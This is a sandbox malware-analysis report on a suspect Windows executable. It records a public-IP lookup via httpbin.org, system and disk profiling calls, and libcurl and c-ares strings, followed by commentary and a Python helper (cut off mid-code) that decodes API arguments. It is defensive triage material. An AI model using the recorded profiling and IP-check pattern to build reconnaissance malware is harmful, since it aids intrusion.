0 | 192.168.2.10 | 49705 | 34.226.108.155 | 443 | 7820 | C:\Users\user\Desktop\Yda6AxtlVP.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:54:56 UTC | 52 | OUT | GET /ip HTTP/1.1
Host: httpbin.org
Accept: */*
2024-12-23 05:54:57 UTC | 224 | IN | HTTP/1.1 200 OK
Date: Mon, 23 Dec 2024 05:54:57 GMT
Content-Type: application/json
Content-Length: 31
Connection: close
Server: gunicorn/19.9.0
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
2024-12-23 05:54:57 UTC | 31 | IN | Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
Data Ascii: { "origin": "8.46.123.189"}



Target ID: 0
Start time: 00:54:51
Start date: 23/12/2024
Path: C:\Users\user\Desktop\Yda6AxtlVP.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Yda6AxtlVP.exe"
Imagebase: 0xd50000
File size: 4'534'272 bytes
MD5 hash: 339948CF14BFED6A4E1CD717BEEB9FFF
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true


Execution Graph

Execution Coverage: 2.3%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 18.9%
Total number of Nodes: 264
Total number of Limit Nodes: 45
execution_graph: [interactive call-graph data (264 nodes, 45 limit nodes; node addresses and edges) is not reproducible as text. API calls referenced by graph nodes: socket, connect, send, recv, recvfrom, select, getsockname, gethostname, if_indextoname, closesocket, ioctlsocket, setsockopt, WSAStartup, WSAIoctl, WSAEventSelect, WSAEnumNetworkEvents, WSAGetLastError, Sleep, SleepEx, RegOpenKeyExA, RegQueryValueExA, RegEnumKeyExA, RegCloseKey, GetSystemInfo, GlobalMemoryStatusEx, GetDriveTypeA, GetDiskFreeSpaceExA, FindFirstFileA, FindFirstFileW, FindNextFileW, CharUpperA, QueryFullProcessImageNameA, CloseHandle, KiUserCallbackDispatcher, isxdigit.]
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    • Associated: 00000000.00000002.1450958835.0000000000D50000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1451008904.000000000146B000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1451008904.000000000146D000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1451552669.0000000001470000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1451570120.0000000001472000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1451570120.0000000001609000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1451570120.0000000001723000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1451570120.0000000001729000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1451570120.0000000001805000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1451570120.000000000180F000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1451570120.000000000181D000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1451877897.000000000181E000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1452000356.00000000019E2000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1452020409.00000000019E4000.00000080.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                                    • API String ID: 0-1590685507
                                                    • Opcode ID: 19108af69c7f17c244eb16a3deb158e24848971ec04407053b5d2e838519a11a
                                                    • Instruction ID: 17c2e77863d0b47943dbd7c11469d7ad8f38b1de58feb60113a2bd9717c21bcf
                                                    • Opcode Fuzzy Hash: 19108af69c7f17c244eb16a3deb158e24848971ec04407053b5d2e838519a11a
                                                    • Instruction Fuzzy Hash: CAC2B231A043449FDB14DF29C485B6AB7E1FF84314F09866DEC989B262D771ED84CBA1

                                                    Control-flow Graph

                                                    APIs
                                                    • GetSystemInfo.KERNELBASE ref: 00D52579
                                                    • GlobalMemoryStatusEx.KERNELBASE ref: 00D525CC
                                                    • GetDriveTypeA.KERNELBASE ref: 00D52647
                                                    • GetDiskFreeSpaceExA.KERNELBASE ref: 00D5267E
                                                    • KiUserCallbackDispatcher.NTDLL ref: 00D527E2
                                                    • FindFirstFileW.KERNELBASE ref: 00D528F8
                                                    • FindNextFileW.KERNELBASE ref: 00D5291F
                                                    Strings
                                                    Similarity
                                                    • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                                    • String ID: @$`
                                                    • API String ID: 3271271169-3318628307
                                                    • Opcode ID: 800e393983531366a98d5529222f863bbcc2b09cdc9753647476d53b53ed7e71
                                                    • Instruction ID: 3b4f91e34b29aec4897057d38c0c9a2daa48797c2768502cc1735b651db18835
                                                    • Opcode Fuzzy Hash: 800e393983531366a98d5529222f863bbcc2b09cdc9753647476d53b53ed7e71
                                                    • Instruction Fuzzy Hash: 06D193B49153099FCB14EF68C5846AEBBF4FF88314F008969E898D7354E7349A88CF52

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1272 d529ff-d52a2f FindFirstFileA 1273 d52a31-d52a36 1272->1273 1274 d52a38 1272->1274 1275 d52a3d-d52a91 call 1236090 call 1236120 RegOpenKeyExA 1273->1275 1274->1275 1280 d52a93-d52a98 1275->1280 1281 d52a9a 1275->1281 1282 d52a9f-d52b0c call 1236090 call 1236120 CharUpperA call 10d8da0 1280->1282 1281->1282 1290 d52b15 1282->1290 1291 d52b0e-d52b13 1282->1291 1292 d52b1a-d52b92 call 1236090 call 1236120 call 10d8e80 call 10d8e70 1290->1292 1291->1292 1301 d52b94-d52ba3 1292->1301 1302 d52bcc-d52c66 QueryFullProcessImageNameA CloseHandle call 10d8da0 1292->1302 1305 d52ba5-d52bae 1301->1305 1306 d52bb0-d52bca call 10d8e68 1301->1306 1312 d52c6f 1302->1312 1313 d52c68-d52c6d 1302->1313 1305->1302 1306->1301 1306->1302 1314 d52c74-d52ce9 call 1236090 call 1236120 call 10d8e80 call 10d8e70 1312->1314 1313->1314 1323 d52dcf-d52e1c call 1236090 call 1236120 CloseHandle 1314->1323 1324 d52cef-d52d49 call 10d8bb0 call 10d8da0 1314->1324 1333 d52e23-d52e2e 1323->1333 1337 d52d99-d52dad 1324->1337 1338 d52d4b-d52d63 call 10d8da0 1324->1338 1335 d52e37 1333->1335 1336 d52e30-d52e35 1333->1336 1340 d52e3c-d52ed6 call 1236090 call 1236120 1335->1340 1336->1340 1337->1323 1338->1337 1344 d52d65-d52d7d call 10d8da0 1338->1344 1354 d52ed8-d52ee1 1340->1354 1355 d52eea 1340->1355 1344->1337 1350 d52d7f-d52d97 call 10d8da0 1344->1350 1350->1337 1357 d52daf-d52dc9 call 10d8e68 1350->1357 1354->1355 1358 d52ee3-d52ee8 1354->1358 1356 d52eef-d52f16 call 1236090 call 1236120 1355->1356 1357->1323 1357->1324 1358->1356
                                                    APIs
                                                    Strings
                                                    Similarity
                                                    • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                                    • String ID: 0
                                                    • API String ID: 2406880114-4108050209
                                                    • Opcode ID: 2b09a35e2e9afde7f41f0f3a2730e2de192732b4963c71e59ac50a6bf381fd8e
                                                    • Instruction ID: b9f80a90bc6343a04a8050a007ab35cce65cfac582683ca4ba286e1c8193a349
                                                    • Opcode Fuzzy Hash: 2b09a35e2e9afde7f41f0f3a2730e2de192732b4963c71e59ac50a6bf381fd8e
                                                    • Instruction Fuzzy Hash: E3E1D4B49043059FDB14EF68D9856ADBBF4BF94314F00886AE898D7354E7349A8CCF52

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1546 d605b0-d605b7 1547 d607ee 1546->1547 1548 d605bd-d605d4 1546->1548 1549 d607e7-d607ed 1548->1549 1550 d605da-d605e6 1548->1550 1549->1547 1550->1549 1551 d605ec-d605f0 1550->1551 1552 d605f6-d60620 call d67350 call d570b0 1551->1552 1553 d607c7-d607cc 1551->1553 1558 d60622-d60624 1552->1558 1559 d6066a-d6068c call d8dec0 1552->1559 1553->1549 1560 d60630-d60655 call d570d0 call d603c0 call d67450 1558->1560 1565 d607d6-d607e3 call d67380 1559->1565 1566 d60692-d606a0 1559->1566 1586 d607ce 1560->1586 1587 d6065b-d60668 call d570e0 1560->1587 1565->1549 1569 d606f4-d606f6 1566->1569 1570 d606a2-d606a4 1566->1570 1573 d607ef-d6082b call d63000 1569->1573 1574 d606fc-d606fe 1569->1574 1571 d606b0-d606e4 call d673b0 1570->1571 1571->1565 1585 d606ea-d606ee 1571->1585 1590 d60831-d60837 1573->1590 1591 d60a2f-d60a35 1573->1591 1578 d6072c-d60754 1574->1578 1582 d60756-d6075b 1578->1582 1583 d6075f-d6078b 1578->1583 1588 d60707-d60719 WSAEventSelect 1582->1588 1589 d6075d 1582->1589 1601 d60700-d60703 1583->1601 1602 d60791-d60796 1583->1602 1585->1571 1595 d606f0 1585->1595 1586->1565 1587->1559 1587->1560 1588->1565 1599 d6071f 1588->1599 1600 d60723-d60726 1589->1600 1593 d60861-d6087e 1590->1593 1594 d60839-d60842 call d66fa0 1590->1594 1596 d60a37-d60a3a 1591->1596 1597 d60a3c-d60a52 1591->1597 1613 d60882-d6088d 1593->1613 1607 d60847-d6084c 1594->1607 1595->1569 1596->1597 1597->1565 1604 d60a58-d60a81 call d62f10 1597->1604 1599->1600 1600->1573 1600->1578 1601->1588 1602->1601 1606 d6079c-d607c2 call d576a0 1602->1606 1604->1565 1619 d60a87-d60a97 call d66df0 1604->1619 1606->1601 1611 d60852 1607->1611 1612 d60a9c-d60aa4 1607->1612 1611->1593 1616 d60854-d6085f 1611->1616 1612->1565 1617 d60893-d608b1 1613->1617 1618 d60970-d60975 1613->1618 1616->1613 1622 d608c8-d608f7 1617->1622 1620 d6097b-d60989 call d570b0 1618->1620 1621 d60a19-d60a2c 1618->1621 1619->1565 1620->1621 1629 d6098f-d6099e 1620->1629 1621->1591 1630 d608fd-d60925 1622->1630 1631 d608f9-d608fb 1622->1631 1633 d609b0-d609c1 call d570d0 1629->1633 1632 d60928-d6093f 1630->1632 1631->1632 1637 d60945-d6096b 1632->1637 1638 d608b3-d608c2 1632->1638 1639 d609c3-d609c7 1633->1639 1640 d609a0-d609ae call d570e0 1633->1640 1637->1638 1638->1618 1638->1622 1641 d609e8-d60a03 WSAEnumNetworkEvents 1639->1641 1640->1621 1640->1633 1643 d60a05-d60a17 1641->1643 1644 d609d0-d609e6 WSAEventSelect 1641->1644 1643->1644 1644->1640 1644->1641
                                                    APIs
                                                    • WSAEventSelect.WS2_32(?,8508C483,?), ref: 00D60712
                                                    • WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 00D609DD
                                                    • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 00D609FC
                                                    Strings
                                                    Similarity
                                                    • API ID: EventSelect$EnumEventsNetwork
                                                    • String ID: multi.c
                                                    • API String ID: 2170980988-214371023
                                                    • Opcode ID: 90c13941d59778571583eecea9b57c2824ba028febecdd22cb0bed838b57efd0
                                                    • Instruction ID: baf3fefe1e7b5c1698c1ce9d0dbfc611bf77182882714e68d9a36d8628ee49d4
                                                    • Opcode Fuzzy Hash: 90c13941d59778571583eecea9b57c2824ba028febecdd22cb0bed838b57efd0
                                                    • Instruction Fuzzy Hash: 2DD1B1716083059FEB10DF64C881B6B7BE5FF94348F08482DF98597281E774E958DBA2

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1771 e1b180-e1b195 1772 e1b3e0-e1b3e7 1771->1772 1773 e1b19b-e1b1a2 1771->1773 1774 e1b1b0-e1b1b9 1773->1774 1774->1774 1775 e1b1bb-e1b1bd 1774->1775 1775->1772 1776 e1b1c3-e1b1d0 1775->1776 1778 e1b1d6-e1b1f2 1776->1778 1779 e1b3db 1776->1779 1780 e1b229-e1b22d 1778->1780 1779->1772 1781 e1b233-e1b246 1780->1781 1782 e1b3e8-e1b417 1780->1782 1783 e1b260-e1b264 1781->1783 1784 e1b248-e1b24b 1781->1784 1789 e1b582-e1b589 1782->1789 1790 e1b41d-e1b429 1782->1790 1785 e1b269-e1b286 call e1af30 1783->1785 1786 e1b215-e1b223 1784->1786 1787 e1b24d-e1b256 1784->1787 1799 e1b2f0-e1b301 1785->1799 1800 e1b288-e1b2a3 call e1b060 1785->1800 1786->1780 1792 e1b315-e1b33c call 10d8b00 1786->1792 1787->1785 1793 e1b435-e1b44c call e1b590 1790->1793 1794 e1b42b-e1b433 call e1b590 1790->1794 1802 e1b342-e1b347 1792->1802 1803 e1b3bf-e1b3ca 1792->1803 1810 e1b458-e1b471 call e1b590 1793->1810 1811 e1b44e-e1b456 call e1b590 1793->1811 1794->1793 1799->1786 1820 e1b307-e1b310 1799->1820 1816 e1b200-e1b213 call e1b020 1800->1816 1817 e1b2a9-e1b2c7 getsockname call e1b020 1800->1817 1807 e1b384-e1b38f 1802->1807 1808 e1b349-e1b358 1802->1808 1812 e1b3cc-e1b3d9 1803->1812 1807->1803 1815 e1b391-e1b3a5 1807->1815 1814 e1b360-e1b382 1808->1814 1829 e1b473-e1b487 1810->1829 1830 e1b48c-e1b4a7 1810->1830 1811->1810 1812->1772 1814->1807 1814->1814 1821 e1b3b0-e1b3bd 1815->1821 1816->1786 1827 e1b2cc-e1b2dd 1817->1827 1820->1812 1821->1803 1821->1821 1827->1786 1831 e1b2e3 1827->1831 1829->1789 1832 e1b4b3-e1b4cb call e1b660 1830->1832 1833 e1b4a9-e1b4b1 call e1b660 1830->1833 1831->1820 1838 e1b4d9-e1b4f5 call e1b660 1832->1838 1839 e1b4cd-e1b4d5 call e1b660 1832->1839 1833->1832 1844 e1b4f7-e1b50b 1838->1844 1845 e1b50d-e1b52b call e1b770 * 2 1838->1845 1839->1838 1844->1789 1845->1789 1850 e1b52d-e1b531 1845->1850 1851 e1b580 1850->1851 1852 e1b533-e1b53b 1850->1852 1851->1789 1853 e1b578-e1b57e 1852->1853 1854 e1b53d-e1b547 1852->1854 1853->1789 1854->1853 1855 e1b549-e1b54d 1854->1855 1855->1853 1856 e1b54f-e1b558 1855->1856 1856->1853 1857 e1b55a-e1b576 call e1b870 * 2 1856->1857 1857->1789 1857->1853
                                                    APIs
                                                    • getsockname.WS2_32(-00000020,-00000020,?), ref: 00E1B2B7
                                                    Strings
                                                    Similarity
                                                    • API ID: getsockname
                                                    • String ID: ares__sortaddrinfo.c$cur != NULL
                                                    • API String ID: 3358416759-2430778319
                                                    • Opcode ID: c8f540591f441832b128d69fb11aca16fc9e9343a001978091d4c5f8ee9a25ab
                                                    • Instruction ID: e2898d0d5c54dd1fb78a216f34463d396c3b9aaecd8047f23773ef8e01515563
                                                    • Opcode Fuzzy Hash: c8f540591f441832b128d69fb11aca16fc9e9343a001978091d4c5f8ee9a25ab
                                                    • Instruction Fuzzy Hash: 3CC181716043059FD718DF24C881AAA77E2FF88358F04996CF859AB3A1D774ED85CB81
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 83690a6be0f42feff916fcb494a957eeb6788ea030a6e8a6d4829145f96c8ef0
                                                    • Instruction ID: b74a2fe96464c364d2c6d4ef0168c53aae5d8bb4cf99cf4eeb5e5037c46c6b5e
                                                    • Opcode Fuzzy Hash: 83690a6be0f42feff916fcb494a957eeb6788ea030a6e8a6d4829145f96c8ef0
                                                    • Instruction Fuzzy Hash: 8B91F33060D34D4BD7358A29C8947BBB2E5EFD5328F189B2CE8A9432D4EB759C40D6A1
                                                    APIs
                                                    • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,00E0712E,?,?,?,00001001,00000000), ref: 00E1A90C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                     • Associated: 00000000.00000002.1450958835.0000000000D50000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1451008904.000000000146B000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1451008904.000000000146D000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1451552669.0000000001470000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1451570120.0000000001472000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1451570120.0000000001609000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1451570120.0000000001723000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1451570120.0000000001729000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1451570120.0000000001805000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1451570120.000000000180F000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1451570120.000000000181D000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1451877897.000000000181E000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1452000356.00000000019E2000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1452020409.00000000019E4000.00000080.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID: recvfrom
                                                    • String ID:
                                                    • API String ID: 846543921-0
                                                    • Opcode ID: 83d46bf298e3c7616b6d7e2826cfbb30d5e9b8d769ee415d6b9384d60492dc9e
                                                    • Instruction ID: bee55b5b30cd2e10252a2dd931760934d526062cc9f73f6e47961da4ca972687
                                                    • Opcode Fuzzy Hash: 83d46bf298e3c7616b6d7e2826cfbb30d5e9b8d769ee415d6b9384d60492dc9e
                                                    • Instruction Fuzzy Hash: 85F01D75109348AFD2209E41EC44DBBBBEDEFC9768F05456DF95823211D271AE50CAB2
                                                    APIs
                                                    • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00E0AA19
                                                    • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00E0AA4C
                                                    • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 00E0AA97
                                                    • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00E0AAE9
                                                    • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00E0AB30
                                                    • RegCloseKey.KERNELBASE(?), ref: 00E0AB6A
                                                    • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 00E0AB82
                                                    • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 00E0AC46
                                                    • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 00E0AD0A
                                                    • RegEnumKeyExA.KERNELBASE ref: 00E0AD8D
                                                    • RegCloseKey.KERNELBASE(?), ref: 00E0ADD9
                                                    • RegEnumKeyExA.KERNELBASE ref: 00E0AE08
                                                    • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 00E0AE2A
                                                    • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00E0AE54
                                                    • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00E0AF63
                                                    • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00E0AFB2
                                                    • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 00E0B072
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID: QueryValue$Open$CloseEnum
                                                    • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                                    • API String ID: 4217438148-1047472027
                                                    • Opcode ID: 9c6cf01f6571fc106ebb61405473ca3f02c09f916d1f32414ad803b0211d0384
                                                    • Instruction ID: 8d6ddbdf086678fcb3d9d19a25a244105c886132ba3dd4ee015f70c029eb7f44
                                                    • Opcode Fuzzy Hash: 9c6cf01f6571fc106ebb61405473ca3f02c09f916d1f32414ad803b0211d0384
                                                    • Instruction Fuzzy Hash: 8C72A2B1604305AFE320DB25DC81B5BB7E8AF85744F18582CF985EB2A1E771E984CB53
                                                    APIs
                                                    • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 00D8A832
                                                    Strings
                                                    • Couldn't bind to '%s' with errno %d: %s, xrefs: 00D8AE1F
                                                    • Local port: %hu, xrefs: 00D8AF28
                                                    • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 00D8AD0A
                                                    • Trying [%s]:%d..., xrefs: 00D8A689
                                                    • Trying %s:%d..., xrefs: 00D8A7C2, 00D8A7DE
                                                    • Name '%s' family %i resolved to '%s' family %i, xrefs: 00D8ADAC
                                                    • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 00D8A6CE
                                                    • @, xrefs: 00D8AC42
                                                    • Local Interface %s is ip %s using address family %i, xrefs: 00D8AE60
                                                    • cf_socket_open() -> %d, fd=%d, xrefs: 00D8A796
                                                    • Could not set TCP_NODELAY: %s, xrefs: 00D8A871
                                                    • cf-socket.c, xrefs: 00D8A5CD, 00D8A735
                                                    • Bind to local port %d failed, trying next, xrefs: 00D8AFE5
                                                    • @, xrefs: 00D8A8F4
                                                    • bind failed with errno %d: %s, xrefs: 00D8B080
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID: setsockopt
                                                    • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                                    • API String ID: 3981526788-2373386790
                                                    • Opcode ID: c32c65f55f5596d5f7bb2285501bde9f14bd90f2b397bf091ffb32aa8790cd5a
                                                    • Instruction ID: 2c17b3a948f5706948feb7a75a8350d0fa00553e08b7c93093b6252d7dc14364
                                                    • Opcode Fuzzy Hash: c32c65f55f5596d5f7bb2285501bde9f14bd90f2b397bf091ffb32aa8790cd5a
                                                    • Instruction Fuzzy Hash: BB62E471508341ABE725DF28C846BABB7E5FF81314F08491AF98897252E771E845CBB3

                                                     Control-flow Graph
                                                     • Rendered as an image in the original report (executed and not-executed basic blocks colour-coded); entry block 00E19740, basic blocks span 00E19740-00E1A070, imported calls RegOpenKeyExA, RegQueryValueExA, RegCloseKey
                                                    APIs
                                                    • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00E19946
                                                    • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00E19974
                                                    • RegCloseKey.KERNELBASE(?), ref: 00E1998B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID: CloseOpenQueryValue
                                                    • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
                                                    • API String ID: 3677997916-4129964100
                                                    • Opcode ID: 70adc558e3ebf708d8e10a749277ffbf5de8ae986620a6b519ea6e5904e2e6ef
                                                    • Instruction ID: 5520c6368f808f3c8601c99da2cb595613a754e9e3f775af2dfcbea99a788ed0
                                                    • Opcode Fuzzy Hash: 70adc558e3ebf708d8e10a749277ffbf5de8ae986620a6b519ea6e5904e2e6ef
                                                    • Instruction Fuzzy Hash: 2132DAB19042016BEB11AB24EC52AAB76E4AF54318F085834FD49B7363FB31ED95C753
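The strings in the three function listings above identify statically linked library code rather than the sample's own logic: cf-socket.c, "Trying %s:%d...", "Could not set TCP_NODELAY: %s" and "connect to %s port %u from %s port %d failed: %s" are libcurl's socket connection filter, and CARES_HOSTS together with the DatabasePath lookup under Tcpip\Parameters is c-ares locating the hosts file, just as the SearchList, Domain, DhcpDomain and PrimaryDNSSuffix reads are c-ares assembling the DNS suffix list. What the report does not spell out is the meaning of the hex constants in the API lines. The following Python helper is an added example, not code from Joe Sandbox or from the sample: it parses API lines in the format printed above (copied here as constructed test input) and decodes the hive handle 80000002 (HKEY_LOCAL_MACHINE), the access masks 00020019 (KEY_READ) and 00000001 (KEY_QUERY_VALUE), the RegQueryValueExA size-probe pattern (lpData NULL and cbData 0, followed by the real call), and setsockopt(?, 6, 1, ...) as IPPROTO_TCP/TCP_NODELAY, which matches the "Could not set TCP_NODELAY" string. It assumes that Joe Sandbox prints out-parameters as the DWORD they point to (the DatabasePath call shows 0x104, MAX_PATH, for lpcbData) and prints raw stack slots beyond the formal parameters, which is why the recvfrom line shows sixteen arguments; the constant tables are the public Windows SDK values.

```python
"""Decode the "APIs" lines of a Joe Sandbox function listing.

Added triage helper, not part of the Joe Sandbox report or the analysed sample.
Assumption: Joe Sandbox prints out-parameters as the DWORD they point to and
prints raw stack slots past the formal parameters, so only leading arguments
are decoded.
"""
import re

# Sample input: lines copied from the report above (constructed test data).
SAMPLE_LINES = [
    r"• RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00E0AA19",
    r"• RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00E0AA4C",
    r"• RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 00E0AE2A",
    r"• setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 00D8A832",
    r"• RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00E19974",
    r"• recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,00E0712E,?,?,?,00001001,00000000), ref: 00E1A90C",
    r"• RegEnumKeyExA.KERNELBASE ref: 00E0AD8D",
]

# API.Module(args), ref: address   (the parenthesised part is absent on some lines)
_CALL_RE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Predefined registry hive handles (winreg.h).
HIVES = {0x80000001: "HKEY_CURRENT_USER", 0x80000002: "HKEY_LOCAL_MACHINE",
         0x80000003: "HKEY_USERS"}
# Registry access-right bits; KEY_READ is the composite 0x20019.
KEY_RIGHTS = [(0x00020000, "STANDARD_RIGHTS_READ"), (0x0001, "KEY_QUERY_VALUE"),
              (0x0002, "KEY_SET_VALUE"), (0x0004, "KEY_CREATE_SUB_KEY"),
              (0x0008, "KEY_ENUMERATE_SUB_KEYS"), (0x0010, "KEY_NOTIFY"),
              (0x0100, "KEY_WOW64_64KEY"), (0x0200, "KEY_WOW64_32KEY")]
KEY_READ = 0x00020019
# Winsock setsockopt levels and option names (winsock2.h / ws2tcpip.h values).
SOCKOPT_LEVELS = {6: "IPPROTO_TCP", 41: "IPPROTO_IPV6", 0xFFFF: "SOL_SOCKET"}
SOCKOPT_NAMES = {("IPPROTO_TCP", 0x0001): "TCP_NODELAY",
                 ("IPPROTO_IPV6", 0x001B): "IPV6_V6ONLY",
                 ("SOL_SOCKET", 0x0004): "SO_REUSEADDR",
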